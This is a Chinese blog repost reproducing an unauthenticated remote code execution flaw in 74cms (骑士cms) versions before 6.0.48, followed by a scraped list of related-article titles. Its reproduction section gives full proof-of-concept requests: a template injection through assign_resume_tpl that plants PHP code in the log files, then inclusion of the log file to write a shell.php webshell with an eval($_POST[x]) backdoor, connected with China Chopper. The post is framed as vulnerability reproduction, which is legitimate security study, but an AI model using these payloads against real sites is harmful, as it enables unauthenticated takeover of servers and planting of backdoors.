0x00简单介绍

骑士cms人才系统,是一项基于php+mysql为核心的开源人才网站系统。

0x01漏洞概述

  骑士cms官方发布安全更新,修复了一处远程代码执行漏洞。由于骑士cms某些函数过滤不严谨,攻击者通过构造恶意请求可以在无需登录情况下执行代码控制服务器。

0x02影响版本

  骑士cms <6.0.48

0x03环境搭建

  这里复现使用的是6.0.20(骑士cms不支持php7.0),下载完成后访问安装即可

0x04漏洞复现

  1、注入模板

发送poc:
http://127.0.0.1/74cms/upload/index.php?m=home&a=assign_resume_tplPOST:variable=1&tpl=<?php  fputs(fopen("shell.php","w"),"<?php  eval(\$_POST[x]);?>")?>; ob_flush();?>/r/n"info" 企业id="$_GET['id']"/>

根据报错查看日志:

路径为WWW\74cms\upload\data\Runtime\Logs\Home

  2、文件包含

发送poc:

http://127.0.0.1/74cms/upload/index.php?m=home&a=assign_resume_tplPOST:variable=1&tpl=data/Runtime/Logs/Home/20_12_15.log(日志文件名为日期)

成功写下shell

菜刀链接

0x05参考链接

https://mp.weixin.qq.com/s/4-36O4OaWxu2jX2pzb5_Wg

https://blog.csdn.net/weixin_44508748/article/details/111187529

0x06 文章来源

https://www.cnblogs.com/twlr/p/14142870.html

cms php vue 开源_骑士CMS文件包含+getshell相关推荐

  1. cms php vue 开源_企业网站制作常用CMS网站内容管理系统推荐

    现在做网站90%的都是采用cms网站管理系统,内容管理系统(CMS)是一种当下非常主流的网站建设系统,能够快速地帮助我们建立一个属于自己的网站,相比定制后台系统,主流的cms都是经过很多年持续更新,经 ...

  2. php excel中解析显示html代码_骑士cms从任意文件包含到远程代码执行漏洞分析

    前言 前些日子,骑士cms 官方公布了一个系统紧急风险漏洞升级通知:骑士cms 6.0.48存在一处任意文件包含漏洞,利用该漏洞对payload文件进行包含,即可造成远程代码执行漏洞.这篇文章将从漏洞 ...

  3. [HXBCTF 2021]easywill writeup(WillPHP源码审计+利用pearcmd.php文件包含getshell)

    [HXBCTF 2021]easywill writeup(WillPHP源码审计+利用pearcmd.php文件包含getshell) [HXBCTF 2021]easywill 1.WillPHP ...

  4. 骑士CMS模版注入+文件包含getshell复现

    声明 好好学习,天天向上 漏洞描述 骑士cms人才系统,是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才网站系统.软件具执行效率高.模板自由切换.后台管理功能方便等诸多优秀特点. 骑 ...

  5. 骑士cms文件包含getshell复现

    00X1 测试环境 骑士 CMS 6.0.48以下均存在此漏洞,本文复现使用骑士cms 6.0.20,下载地址: http://www.74cms.com/download/index.html 注意 ...

  6. (环境搭建+复现)74CMS模版注入+文件包含getshell

    0x00 简介 骑士CMS人才招聘系统是基于PHP+MYSQL的免费网站管理系统源码,提供完善的人才招聘网站建设方案. 0x01 漏洞概述 骑士 CMS 官方发布安全更新,修复了一处远程代码执行漏洞. ...

  7. 文件包含getshell

    简介 开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,而无需再次编写,这中文件调用的过程一般被称为文件包含. allow_url_fopen = On(是否允许打开远程 ...

  8. cms php vue 开源_2020最受欢迎的企业网站CMS建站系统排行榜

    对于大多数站长来说,企业网站CMS可能再熟悉不过了.但对于新手站长来讲,可能还不太了解什么是企业网站CMS,或企业网站CMS是做什么的.而我们经常可以在网上看见有人问:哪个CMS系统最好用?企业建站用 ...

  9. 七彩cms云转码_七彩CMS视频转码 2019云转码彻底开源系统版本号

    源代码详细介绍 自然环境规定:nginx 1.16.2,php7.2,mariadb10.3 视頻情况一直是"已经等候转换格式",这个是因为ffmpeg沒有管理权限.视频转码要采用 ...

最新文章

  1. google guava工具包collect包HashMultiMap基本用法
  2. 图数据集之cora数据集介绍 --- 适用于GCN任务
  3. iOS CoreAnimation
  4. 【渝粤题库】广东开放大学 文化产业概论 形成性考核
  5. [转载]基于TFS实践敏捷-修复Bug和执行代码评审
  6. Apache-配置、测试和调试
  7. 学html需要什么软件,在上海学html需要学什么软件?
  8. selenium:解决页面元素display:none的方法
  9. Android版抢票神器使用指南及下载地址
  10. 数学建模四大模型、历年国赛题目以及优秀论文(备战2021年数模国赛)
  11. 笔记本电脑装android系统安装教程,电脑安装安卓系统教程 三分钟教学换装系统...
  12. 二项分布 (Binomial Distribution)
  13. 微信公众号图文如何添加PDF附件
  14. 经典文献阅读之--PL-SLAM(点线SLAM)
  15. RCNN SPPNet Fast R-CNN Faster R-CNN Cascade R-CNN
  16. matlab和vc,Vc++和matlab双剑合璧
  17. Linux卸载挂载点时,会遇到“device is busy”提示
  18. 财路网每日原创推送: 科普:区块链在其他领域的一些应用
  19. 因为PPBC的防盗链,尝试用vba的对象来解决,顺便复习一下。。。
  20. LINUX指令集介绍

热门文章

  1. Only call `sigmoid_cross_entropy_with_logits` with named arguments解决
  2. OpenMp使用例子
  3. 数据标准化(归一化)
  4. RedHat6.5网卡问题总结
  5. etl常用的三种工具介绍_Adobe Photoshop常用修图插件+屏幕模式+内容感知移动工具介绍...
  6. 学生籍贯信息管理系统c语言,学生籍贯信息管理系统(c).doc
  7. linux 主进程 等待,Linux启动与进程
  8. linux下oracle启动关闭
  9. 将单词的首字母转换成大写
  10. java jtabbedpane 关闭_JTabbedPane实现关闭按钮 | 学步园